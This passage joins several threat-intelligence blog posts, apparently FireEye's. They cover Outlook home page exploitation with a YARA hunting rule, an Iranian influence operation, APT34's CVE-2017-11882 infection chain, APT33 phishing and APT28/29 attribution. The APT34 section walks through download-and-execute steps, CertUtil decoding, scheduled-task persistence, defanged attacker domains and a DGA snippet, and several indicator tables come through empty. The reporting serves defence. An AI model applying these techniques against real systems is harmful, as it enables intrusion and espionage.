  • The payload to be executed via Outlook client-side mail rule must contain no arguments, which is likely why a compiled Aut2exe executable was chosen. 95f3bea43338addc1ad951cd2d42eb6f does nothing but execute a PowerShell one-liner to retrieve additional malicious content for execution. However, execution of this command natively using an Outlook rule was not possible due to this limitation.

With that in mind, the initial infection vector is illustrated in Figure 4.

Figure 4: Initial infection vector

As both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly adopted. SensePost's identification and responsible disclosure of CVE-2017-11774 was no different. For an excellent description of abusing Outlook's home page for shell and persistence from an attacker’s perspective, refer to SensePost's blog.

FireEye has observed and documented an uptick in several malicious attackers' usage of this specific home page exploitation technique. Based on our experience, this particular method may be more successful due to defenders misinterpreting artifacts and focusing on incorrect mitigations. This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this observation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule to differentiate these Outlook home page payloads at the end of this post.

Understanding this nuance further highlights the exposure to this technique when combined with password spraying as documented with this attacker, and underscores the importance of layered email security defenses, including multi-factor authentication and patch management. We recommend the organizations reduce their email attack surface as much as possible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software clients used to access that server are patched. Beyond implementing multi-factor authentication for Outlook 365/Exchange access, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are exposed for exploitation by toolkits such as SensePost’s RULER.

Microsoft Outlook Security Update

RULER Module Addressed

June 13, 2017 Security Update


September 12, 2017 Security Update


October 10, 2017 Security Update


Table 3: Outlook attack surface mitigations

Detecting the Techniques

FireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON. Table 4 contains several specific detection names that applied to the email exploitation and initial infection activity.



Endpoint Security


Network and Email Security

HackTool.RULER (Network Traffic)

Table 4: FireEye product detections

For organizations interested in hunting for Outlook home page shell and persistence, we’ve included a Yara rule that can also be used for context to differentiate these payloads from other scripts:

rule Hunting_Outlook_Homepage_Shell_and_Persistence
        author = "Nick Carr (@itsreallynick)"
        reference_hash = "506fe019d48ff23fac8ae3b6dd754f6e"
        $script_1 = "<htm" ascii nocase wide
        $script_2 = "<script" ascii nocase wide
        $viewctl1_a = "ViewCtl1" ascii nocase wide
        $viewctl1_b = "0006F063-0000-0000-C000-000000000046" ascii wide
        $viewctl1_c = ".OutlookApplication" ascii nocase wide
        uint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*)


The authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects, Omar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued comprehensive Outlook client exploitation product coverage.

Suspected Iranian Influence Operation Leverages Network of Inauthentic News Sites & Social Media Targeting Audiences in U.S., UK, Latin America, Middle East

FireEye has identified a suspected influence operation that appears to originate from Iran aimed at audiences in the U.S., U.K., Latin America, and the Middle East. This operation is leveraging a network of inauthentic news sites and clusters of associated accounts across multiple social media platforms to promote political narratives in line with Iranian interests. These narratives include anti-Saudi, anti-Israeli, and pro-Palestinian themes, as well as support for specific U.S. policies favorable to Iran, such as the U.S.-Iran nuclear deal (JCPOA). The activity we have uncovered is significant, and demonstrates that actors beyond Russia continue to engage in and experiment with online, social media-driven influence operations to shape political discourse.

What Is This Activity?

Figure 1 maps the registration and content promotion connections between the various inauthentic news sites and social media account clusters we have identified thus far. This activity dates back to at least 2017. At the time of publication of this blog post, we continue to investigate and identify additional social media accounts and websites linked to this activity. For example, we have identified multiple Arabic-language, Middle East-focused sites that appear to be part of this broader operation that we do not address here.

Figure 1: Connections among components of suspected Iranian influence operation

We use the term “inauthentic” to describe sites that are not transparent in their origins and affiliations, undertake concerted efforts to mask these origins, and often use false social media personas to promote their content. The content published on the various websites consists of a mix of both original content and news articles appropriated, and sometimes altered, from other sources.

Who Is Conducting this Activity and Why?

Based on an investigation by FireEye Intelligence’s Information Operations analysis team, we assess with moderate confidence that this activity originates from Iranian actors. This assessment is based on a combination of indicators, including site registration data and the linking of social media accounts to Iranian phone numbers, as well as the promotion of content consistent with Iranian political interests. For example:

  • Registrant emails for the sites ‘Liberty Front Press’ and ‘Instituto Manquehue’ are associated with advertisements for website designers in Tehran and with the Iran-based site gahvare[.]com, respectively.
  • We have identified multiple Twitter accounts directly affiliated with the sites, as well as other associated Twitter accounts, that are linked to phone numbers with the +98 Iranian country code.
  • We have observed inauthentic social media personas, masquerading as American liberals supportive of U.S. Senator Bernie Sanders, heavily promoting Quds Day, a holiday established by Iran in 1979 to express support for Palestinians and opposition to Israel.

We limit our assessment regarding Iranian origins to moderate confidence because influence operations, by their very nature, are intended to deceive by mimicking legitimate online activity as closely as possible. While highly unlikely given the evidence we have identified, some possibility nonetheless remains that the activity could originate from elsewhere, was designed for alternative purposes, or includes some small percentage of authentic online behavior. We do not currently possess additional visibility into the specific actors, organizations, or entities behind this activity. Although the Iran-linked APT35 (Newscaster) has previously used inauthentic news sites and social media accounts to facilitate espionage, we have not observed any links to APT35.

Broadly speaking, the intent behind this activity appears to be to promote Iranian political interests, including anti-Saudi, anti-Israeli, and pro-Palestinian themes, as well as to promote support for specific U.S. policies favorable to Iran, such as the U.S.-Iran nuclear deal (JCPOA). In the context of the U.S.-focused activity, this also includes significant anti-Trump messaging and the alignment of social media personas with an American liberal identity. However, it is important to note that the activity does not appear to have been specifically designed to influence the 2018 U.S. midterm elections, as it extends well beyond U.S. audiences and U.S. politics.


The activity we have uncovered highlights that multiple actors continue to engage in and experiment with online, social media-driven influence operations as a means of shaping political discourse. These operations extend well beyond those conducted by Russia, which has often been the focus of research into information operations over recent years. Our investigation also illustrates how the threat posed by such influence operations continues to evolve, and how similar influence tactics can be deployed irrespective of the particular political or ideological goals being pursued.

Additional Details

Read the full report for more information.

New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit

Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14, 2017, FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East. We assess this activity was carried out by a suspected Iranian cyber espionage threat group, whom we refer to as APT34, using a custom PowerShell backdoor to achieve its objectives.

We believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014. This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.

APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. We now attribute that campaign to APT34. In July 2017, we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER, based on strings within the malware. The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199.

In this latest campaign, APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER.

The full report on APT34 is available to our MySIGHT customer community. APT34 loosely aligns with public reporting related to the group "OilRig". As individual organizations may track adversaries using varied data sets, it is possible that our classifications of activity may not wholly align.

CVE-2017-11882: Microsoft Office Stack Memory Corruption Vulnerability

CVE-2017-11882 affects several versions of Microsoft Office and, when exploited, allows a remote user to run arbitrary code in the context of the current user as a result of improperly handling objects in memory. The vulnerability was patched by Microsoft on Nov. 14, 2017. A full proof of concept (POC) was publicly released a week later by the reporter of the vulnerability.

The vulnerability exists in the old Equation Editor (EQNEDT32.EXE), a component of Microsoft Office that is used to insert and evaluate mathematical formulas. The Equation Editor is embedded in Office documents using object linking and embedding (OLE) technology. It is created as a separate process instead of child process of Office applications. If a crafted formula is passed to the Equation Editor, it does not check the data length properly while copying the data, which results in stack memory corruption. As the EQNEDT32.exe is compiled using an older compiler and does not support address space layout randomization (ASLR), a technique that guards against the exploitation of memory corruption vulnerabilities, the attacker can easily alter the flow of program execution.


APT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a malicious spear phishing email sent to the victim organization. The malicious file exploits CVE-2017-11882, which corrupts the memory on the stack and then proceeds to push the malicious data to the stack. The malware then overwrites the function address with the address of an existing instruction from EQNEDT32.EXE. The overwritten instruction (displayed in Figure 1) is used to call the “WinExec” function from kernel32.dll, as depicted in the instruction at 00430c12, which calls the “WinExec” function.

Figure 1: Disassembly of overwritten function address

After exploitation, the ‘WinExec’ function is successfully called to create a child process, “mshta.exe”, in the context of current logged on user. The process “mshta.exe” downloads a malicious script from hxxp://mumbai-m[.]site/b.txt and executes it, as seen in Figure 2.

Figure 2: Attacker data copied to corrupt stack buffer

Execution Workflow

The malicious script goes through a series of steps to successfully execute and ultimately establish a connection to the command and control (C2) server. The full sequence of events starting with the exploit document is illustrated in Figure 3.

Figure 3: CVE-2017-11882 and POWRUNER attack sequence

  1. The malicious .rtf file exploits CVE-2017-11882.
  2. The malware overwrites the function address with an existing instruction from EQNEDT32.EXE.
  3. The malware creates a child process, “mshta.exe,” which downloads a file from: hxxp://mumbai-m[.]site/b.txt.
  4. b.txt contains a PowerShell command to download a dropper from: hxxp://dns-update[.]club/v.txt. The PowerShell command also renames the downloaded file from v.txt to v.vbs and executes the script.
  5. The v.vbs script drops four components (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory: C:\ProgramData\Windows\Microsoft\java\
  6. v.vbs uses CertUtil.exe, a legitimate Microsoft command-line program installed as part of Certificate Services, to decode the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base, and drop hUpdateCheckers.ps1 and dUpdateCheckers.ps1 to the staging directory.
  7. cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence.
  8. GoogleUpdateschecker.vbs is executed after sleeping for five seconds.
  9. cUpdateCheckers.bat and *.base are deleted from the staging directory.

Figure 4 contains an excerpt of the v.vbs script pertaining to the Execution Workflow section.

Figure 4: Execution Workflow Section of v.vbs

After successful execution of the steps mentioned in the Execution Workflow section, the Task Scheduler will launch GoogleUpdateschecker.vbs every minute, which in turn executes the dUpdateCheckers.ps1 and hUpdateCheckers.ps1 scripts. These PowerShell scripts are final stage payloads – they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities. 

hUpdateCheckers.ps1 (POWRUNER)

The backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server. POWRUNER is executed every minute by the Task Scheduler. Figure 5 contains an excerpt of the POWRUNER backdoor.

Figure 5: POWRUNER PowerShell script hUpdateCheckers.ps1

POWRUNER begins by sending a random GET request to the C2 server and waits for a response. The server will respond with either “not_now” or a random 11-digit number. If the response is a random number, POWRUNER will send another random GET request to the server and store the response in a string. POWRUNER will then check the last digit of the stored random number response, interpret the value as a command, and perform an action based on that command. The command values and the associated actions are described in Table 1.





Server response string contains batch commands

Execute batch commands and send results back to server


Server response string is a file path

Check for file path and upload (PUT) the file to server


Server response string is a file path

Check for file path and download (GET) the file

Table 1: POWRUNER commands

After successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution.

The C2 server can also send a PowerShell command to capture and store a screenshot of a victim’s system. POWRUNER will send the captured screenshot image file to the C2 server if the “fileupload” command is issued. Figure 6 shows the PowerShell “Get-Screenshot” function sent by the C2 server.

Figure 6: Powershell Screenshot Functionality

dUpdateCheckers.ps1 (BONDUPDATER)

One of the recent advancements by APT34 is the use of DGA to generate subdomains. The BONDUPDATER script, which was named based on the hard-coded string “B007”, uses a custom DGA algorithm to generate subdomains for communication with the C2 server.

DGA Implementation

Figure 7 provides a breakdown of how an example domain (456341921300006B0C8B2CE9C9B007.mumbai-m[.]site) is generated using BONDUPDATER’s custom DGA.

Figure 7: Breakdown of subdomain created by BONDUPDATER

  1. This is a randomly generated number created using the following expression: $rnd = -join (Get-Random -InputObject (10..99) -Count (%{ Get-Random -InputObject (1..6)}));
  2. This value is either 0 or 1. It is initially set to 0. If the first resolved domain IP address starts with 24.125.X.X, then it is set to 1.
  3. Initially set to 000, then incremented by 3 after every DNS request
  4. First 12 characters of system UUID.
  5. “B007” hardcoded string.
  6. Hardcoded domain “mumbai-m[.]site”

BONDUPDATER will attempt to resolve the resulting DGA domain and will take the following actions based on the IP address resolution:

  1. Create a temporary file in %temp% location
    • The file created will have the last two octets of the resolved IP addresses as its filename.
  2. BONDUPDATER will evaluate the last character of the file name and perform the corresponding action found in Table 2.




File contains batch commands, it executes the batch commands


Rename the temporary file as .ps1 extension


Rename the temporary file as .vbs extension

Table 2: BONDUPDATER Actions

Figure 8 is a screenshot of BONDUPDATER’s DGA implementation.

Figure 8: Domain Generation Algorithm

Some examples of the generated subdomains observed at time of execution include:




Network Communication

Figure 9 shows example network communications between a POWRUNER backdoor client and server.

Figure 9: Example Network Communication

In the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with ‘0’, POWRUNER sends another random GET request to receive  an additional command string. The C2 server sends back Base64 encoded response.

If the server had sent the string “not_now” as response, as shown in Figure 10, POWRUNER would have ceased any further requests and terminated its execution.

Figure 10: Example "not now" server response

Batch Commands

POWRUNER may also receive batch commands from the C2 server to collect host information from the system. This may include information about the currently logged in user, the hostname, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data. An example batch command is provided in Figure 11.

Figure 11: Batch commands sent by POWRUNER C2 server


APT34 has used POWRUNER and BONDUPDATER to target Middle East organizations as early as July 2017. In July 2017, a FireEye Web MPS appliance detected and blocked a request to retrieve and install an APT34 POWRUNER / BONDUPDATER downloader file. During the same month, FireEye observed APT34 target a separate Middle East organization using a malicious .rtf file (MD5: 63D66D99E46FB93676A4F475A65566D8) that exploited CVE-2017-0199. This file issued a GET request to download a malicious file from:


As shown in Figure 12, the script within the dupatechecker.doc file attempts to download another file named dupatechecker.exe from the same server. The file also contains a comment by the malware author that appears to be an apparent taunt to security researchers.

Figure 12: Contents of dupdatechecker.doc script

The dupatechecker.exe file (MD5: C9F16F0BE8C77F0170B9B6CE876ED7FB) drops both BONDUPDATER and POWRUNER. These files connect to proxychecker[.]pro for C2.

Outlook and Implications

Recent activity by APT34 demonstrates that they are capable group with potential access to their own development resources. During the past few months, APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities (CVE-2017-0199 and CVE-2017-11882) to target organizations in the Middle East. We assess that APT34’s efforts to continuously update their malware, including the incorporation of DGA for C2, demonstrate the group’s commitment to pursing strategies to deter detection. We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region.


Filename / Domain / IP Address

MD5 Hash or Description

CVE-2017-11882 exploit document





















Malware Staging Server

CVE-2017-0199 exploit document


Malware Staging Server







Has resolved mumbai-m[.]site & hpserver[.]online

Has resolved mumbai-m[.]site and dns-update[.]club

Has resolved dns-update[.]club

Has resolved dns-update[.]club

Has resolved ns2.dns-update[.]club & hpserver[.]online & anyportals[.]com




























Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware

When discussing suspected Middle Eastern hacker groups with destructive capabilities, many automatically think of the suspected Iranian group that previously used SHAMOON – aka Disttrack – to target organizations in the Persian Gulf. However, over the past few years, we have been tracking a separate, less widely known suspected Iranian group with potential destructive capabilities, whom we call APT33. Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013. We assess APT33 works at the behest of the Iranian government.

Recent investigations by FireEye’s Mandiant incident response consultants combined with FireEye iSIGHT Threat Intelligence analysis have given us a more complete picture of APT33’s operations, capabilities, and potential motivations. This blog highlights some of our analysis. Our detailed report on FireEye Threat Intelligence contains a more thorough review of our supporting evidence and analysis. We will also be discussing this threat group further during our webinar on Sept. 21 at 8 a.m. ET.


APT33 has targeted organizations – spanning multiple industries – headquartered in the United States, Saudi Arabia and South Korea. APT33 has shown particular interest in organizations in the aviation sector involved in both military and commercial capacities, as well as organizations in the energy sector with ties to petrochemical production.

From mid-2016 through early 2017, APT33 compromised a U.S. organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings.

During the same time period, APT33 also targeted a South Korean company involved in oil refining and petrochemicals. More recently, in May 2017, APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company.

We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia’s military aviation capabilities to enhance Iran’s domestic aviation capabilities or to support Iran’s military and strategic decision making vis a vis Saudi Arabia.

We believe the targeting of the Saudi organization may have been an attempt to gain insight into regional rivals, while the targeting of South Korean companies may be due to South Korea’s recent partnerships with Iran’s petrochemical industry as well as South Korea’s relationships with Saudi petrochemical companies. Iran has expressed interest in growing their petrochemical industry and often posited this expansion in competition to Saudi petrochemical companies. APT33 may have targeted these organizations as a result of Iran’s desire to expand its own petrochemical production and improve its competitiveness within the region. 

The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups, indicating a common interest in the sectors across Iranian actors.

Figure 1 shows the global scope of APT33 targeting.

Figure 1: Scope of APT33 Targeting

Spear Phishing

APT33 sent spear phishing emails to employees whose jobs related to the aviation industry. These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files. The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be relevant to the targeted individuals.

An example .hta file excerpt is provided in Figure 2. To the user, the file would appear as benign references to legitimate job postings; however, unbeknownst to the user, the .hta file also contained embedded code that automatically downloaded a custom APT33 backdoor.

Figure 2: Excerpt of an APT33 malicious .hta file

We assess APT33 used a built-in phishing module within the publicly available ALFA TEaM Shell (aka ALFASHELL) to send hundreds of spear phishing emails to targeted individuals in 2016. Many of the phishing emails appeared legitimate – they referenced a specific job opportunity and salary, provided a link to the spoofed company’s employment website, and even included the spoofed company’s Equal Opportunity hiring statement. However, in a few cases, APT33 operators left in the default values of the shell’s phishing module. These appear to be mistakes, as minutes after sending the emails with the default values, APT33 sent emails to the same recipients with the default values removed.

As shown in Figure 3, the “fake mail” phishing module in the ALFA Shell contains default values, including the sender email address (solevisible@gmail[.]com), subject line (“your site hacked by me”), and email body (“Hi Dear Admin”).

Figure 3: ALFA TEaM Shell v2-Fake Mail (Default)

Figure 4 shows an example email containing the default values the shell.

Figure 4: Example Email Generated by the ALFA Shell with Default Values

Domain Masquerading

APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training, maintenance and support for Saudi’s military and commercial fleet. Based on observed targeting patterns, APT33 likely used these domains in spear phishing emails to target victim organizations.    

The following domains masquerade as these organizations: Boeing, Alsalam Aircraft Company, Northrop Grumman Aviation Arabia (NGAAKSA), and Vinnell Arabia.






Boeing, Alsalam Aircraft company, and Saudia Aerospace Engineering Industries entered into a joint venture to create the Saudi Rotorcraft Support Center in Saudi Arabia in 2015 with the goal of servicing Saudi Arabia’s rotorcraft fleet and building a self-sustaining workforce in the Saudi aerospace supply base.

Alsalam Aircraft Company also offers military and commercial maintenance, technical support, and interior design and refurbishment services.

Two of the domains appeared to mimic Northrop Grumman joint ventures. These joint ventures – Vinnell Arabia and Northrop Grumman Aviation Arabia – provide aviation support in the Middle East, specifically in Saudi Arabia. Both Vinnell Arabia and Northrop Grumman Aviation Arabia have been involved in contracts to train Saudi Arabia’s Ministry of National Guard.

Identified Persona Linked to Iranian Government

We identified APT33 malware tied to an Iranian persona who may have been employed by the Iranian government to conduct cyber threat activity against its adversaries.

We assess an actor using the handle “xman_1365_x” may have been involved in the development and potential use of APT33’s TURNEDUP backdoor due to the inclusion of the handle in the processing-debugging (PDB) paths of many of TURNEDUP samples. An example can be seen in Figure 5.

Figure 5: “xman_1365_x" PDB String in TURNEDUP Sample

Xman_1365_x was also a community manager in the Barnamenevis Iranian programming and software engineering forum, and registered accounts in the well-known Iranian Shabgard and Ashiyane forums, though we did not find evidence to suggest that this actor was ever a formal member of the Shabgard or Ashiyane hacktivist groups.

Open source reporting links the “xman_1365_x” actor to the “Nasr Institute,” which is purported to be equivalent to Iran’s “cyber army” and controlled by the Iranian government. Separately, additional evidence ties the “Nasr Institute” to the 2011-2013 attacks on the financial industry, a series of denial of service attacks dubbed Operation Ababil. In March 2016, the U.S. Department of Justice unsealed an indictment that named two individuals allegedly hired by the Iranian government to build attack infrastructure and conduct distributed denial of service attacks in support of Operation Ababil. While the individuals and the activity described in indictment are different than what is discussed in this report, it provides some evidence that individuals associated with the “Nasr Institute” may have ties to the Iranian government.

Potential Ties to Destructive Capabilities and Comparisons with SHAMOON

One of the droppers used by APT33, which we refer to as DROPSHOT, has been linked to the wiper malware SHAPESHIFT. Open source research indicates SHAPESHIFT may have been used to target organizations in Saudi Arabia.

Although we have only directly observed APT33 use DROPSHOT to deliver the TURNEDUP backdoor, we have identified multiple DROPSHOT samples in the wild that drop SHAPESHIFT. The SHAPESHIFT malware is capable of wiping disks, erasing volumes and deleting files, depending on its configuration. Both DROPSHOT and SHAPESHIFT contain Farsi language artifacts, which indicates they may have been developed by a Farsi language speaker (Farsi is the predominant and official language of Iran).

While we have not directly observed APT33 use SHAPESHIFT or otherwise carry out destructive operations, APT33 is the only group that we have observed use the DROPSHOT dropper. It is possible that DROPSHOT may be shared amongst Iran-based threat groups, but we do not have any evidence that this is the case.

In March 2017, Kasperksy released a report that compared DROPSHOT (which they call Stonedrill) with the most recent variant of SHAMOON (referred to as Shamoon 2.0). They stated that both wipers employ anti-emulation techniques and were used to target organizations in Saudi Arabia, but also mentioned several differences. For example, they stated DROPSHOT uses more advanced anti-emulation techniques, utilizes external scripts for self-deletion, and uses memory injection versus external drivers for deployment. Kaspersky also noted the difference in resource language sections: SHAMOON embeds Arabic-Yemen language resources while DROPSHOT embeds Farsi (Persian) language resources.

We have also observed differences in both targeting and tactics, techniques and procedures (TTPs) associated with the group using SHAMOON and APT33. For example, we have observed SHAMOON being used to target government organizations in the Middle East, whereas APT33 has targeted several commercial organizations both in the Middle East and globally. APT33 has also utilized a wide range of custom and publicly available tools during their operations. In contrast, we have not observed the full lifecycle of operations associated with SHAMOON, in part due to the wiper removing artifacts of the earlier stages of the attack lifecycle.

Regardless of whether DROPSHOT is exclusive to APT33, both the malware and the threat activity appear to be distinct from the group using SHAMOON. Therefore, we assess there may be multiple Iran-based threat groups capable of carrying out destructive operations.

Additional Ties Bolster Attribution to Iran

APT33’s targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests, implying that the threat actor is most likely government sponsored. This coupled with the timing of operations – which coincides with Iranian working hours – and the use of multiple Iranian hacker tools and name servers bolsters our assessment that APT33 may have operated on behalf of the Iranian government.

The times of day that APT33 threat actors were active suggests that they were operating in a time zone close to 04:30 hours ahead of Coordinated Universal Time (UTC). The time of the observed attacker activity coincides with Iran’s Daylight Time, which is +0430 UTC.

APT33 largely operated on days that correspond to Iran’s workweek, Saturday to Wednesday. This is evident by the lack of attacker activity on Thursday, as shown in Figure 6. Public sources report that Iran works a Saturday to Wednesday or Saturday to Thursday work week, with government offices closed on Thursday and some private businesses operating on a half day schedule on Thursday. Many other Middle East countries have elected to have a Friday and Saturday weekend. Iran is one of few countries that subscribes to a Saturday to Wednesday workweek.

APT33 leverages popular Iranian hacker tools and DNS servers used by other suspected Iranian threat groups. The publicly available backdoors and tools utilized by APT33 – including NANOCORE, NETWIRE, and ALFA Shell – are all available on Iranian hacking websites, associated with Iranian hackers, and used by other suspected Iranian threat groups. While not conclusive by itself, the use of publicly available Iranian hacking tools and popular Iranian hosting companies may be a result of APT33’s familiarity with them and lends support to the assessment that APT33 may be based in Iran.

Figure 6: APT33 Interactive Commands by Day of Week

Outlook and Implications

Based on observed targeting, we believe APT33 engages in strategic espionage by targeting geographically diverse organizations across multiple industries. Specifically, the targeting of organizations in the aerospace and energy sectors indicates that the threat group is likely in search of strategic intelligence capable of benefitting a government or military sponsor. APT33’s focus on aviation may indicate the group’s desire to gain insight into regional military aviation capabilities to enhance Iran’s aviation capabilities or to support Iran’s military and strategic decision making. Their targeting of multiple holding companies and organizations in the energy sectors align with Iranian national priorities for growth, especially as it relates to increasing petrochemical production. We expect APT33 activity will continue to cover a broad scope of targeted entities, and may spread into other regions and sectors as Iranian interests dictate.

APT33’s use of multiple custom backdoors suggests that they have access to some of their own development resources, with which they can support their operations, while also making use of publicly available tools. The ties to SHAPESHIFT may suggest that APT33 engages in destructive operations or that they share tools or a developer with another Iran-based threat group that conducts destructive operations.


Malware Family Descriptions

Malware Family




Dropper that has been observed dropping and launching the TURNEDUP backdoor, as well as the SHAPESHIFT wiper malware



Publicly available remote access Trojan (RAT) available for purchase. It is a full-featured backdoor with a plugin framework



Backdoor that attempts to steal credentials from the local machine from a variety of sources and supports other standard backdoor features.



Backdoor capable of uploading and downloading files, creating a reverse shell, taking screenshots, and gathering system information


Indicators of Compromise

APT33 Domains Likely Used in Initial Targeting







APT33 Domains / IPs Used for C2

C2 Domain






















Publicly Available Tools used by APT33



Compile Time (UTC)



2017/1/11 2:20



2016/3/9 23:48



2016/6/29 13:44



2016/5/29 14:11

Unattributed DROPSHOT / SHAPESHIFT MD5 Hashes



Compile Time (UTC)




n/a - timestomped



n/a - timestomped



2016/11/14 21:16:40



2016/11/14 21:16:40

APT33 Malware MD5 Hashes



Compile Time (UTC)



2016/10/19 14:26



2014/6/1 11:01



2016/9/18 10:50



2016/3/8 12:34



2016/3/8 12:34



2015/3/12 5:59



2015/3/12 5:59



2015/3/12 5:59



2015/3/9 16:56



2015/3/9 16:56



2015/3/9 16:56



2015/3/9 16:56



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2014/6/1 11:01



2013/4/10 10:43



2013/4/10 10:43



2013/4/10 10:43

DHS and FBI Joint Analysis Report Confirms FireEye’s Assessment that Russian Government Likely Sponsors APT28 and APT29

On Dec. 29, 2016, the Department of Homeland Security (DHS) and Federal Bureau of Investigation (FBI) released a Joint Analysis Report confirming FireEye’s long held public assessment that the Russian government likely sponsors the groups that we track as Advanced Persistent Threat (APT) 28 and APT29. We have tracked and profiled these groups through multiple investigations, endpoint and network detections, and continuous monitoring, allowing us to understand the groups’ malware, operational changes and motivations. This intelligence has been critical to protecting and informing our clients and exposing this threat.

FireEye first publicly announced that the Russian government likely sponsors APT28 in a report released in October 2014. APT28 has pursued military and political targets in the U.S. and globally, including U.S. political organizations, anti-doping agencies, NGOs, foreign and defense ministries, defense attaches, media outlets, and high profile government and private sector entities. Since at least 2007, APT28 has conducted operations using a sophisticated set of malware that employs a flexible, modular framework allowing APT28 to consistently evolve its toolset for future operations. APT28’s operations closely align with Russian military interests and the 2016 breaches, and pursuant public data leaks demonstrate the Russian government's wide-ranging approach to advancing its strategic political interests.

In July 2015, we released a report focusing on a tool used by APT29, malware that we call HAMMERTOSS. In detailing the sophistication and attention to obfuscation evident in HAMMERTOSS, we sought to explain how APT29’s tool development effort defined a clandestine, well-resourced and state-sponsored effort. Additionally, we have observed APT29 target and breach entities including government agencies, universities, law firms and private sector targets. APT29 remains one of the most capable groups that we track, and the group’s past and recent activity is consistent with state espionage.

The Joint Analysis Report also includes indicators for another group we (then iSIGHT Partners) profiled publicly in 2014: Sandworm Team. Since 2009, this group has targeted entities in the energy, transportation and financial services industries. They have deployed destructive malware that impacted the power grid in Ukraine in late 2015 and used related malware to affect a Ukrainian ministry and other financial entities in December 2016. Chiefly characterized by their use of the well-known Black Energy trojan, Sandworm Team has often retrofitted publicly available malware to further their offensive operations. Sandworm Team has exhibited considerable skill and used extensive resources to conduct offensive operations.